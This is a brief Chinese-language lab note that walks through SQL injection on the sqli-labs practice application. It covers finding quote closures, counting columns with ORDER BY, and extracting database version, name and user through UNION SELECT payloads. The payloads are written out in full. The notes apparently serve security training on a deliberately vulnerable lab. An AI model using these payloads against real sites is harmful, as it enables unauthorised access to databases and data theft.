web 实验
1 漏洞检查
方法 利用 1=0 和 1=1 来测试页面
从而来构建常见的闭合 ‘ “ ’) ”)
正常页面
由测试可知此闭合结构为 id=’$id’
判断列数:
利用函数 order by ;
如是超出范围则会报错
http://192.168.206.132/sqli-labs-master/Less-1/?id=1‘ union all select 1,2,3,4 --+
查出列数为3列 在利用函数找到你想要的
database() version() user()
-1' union all select version(),database(),user() --+
同理:
测试: id = 1 and 1=0
直接显示
则判断无闭合 id = $id
?id=1 ' and 1=0 --+
推测闭合符号是由’)组合
?id=1’) and 1=0 --+
判断列数:
?id =1 ') order by 4 --+
?id =-1 ') order by 3 --+
?id=1 " and 1=0 --+
闭合组合 id = ‘ $id ")’
?id = 1 ") and 1=0 --+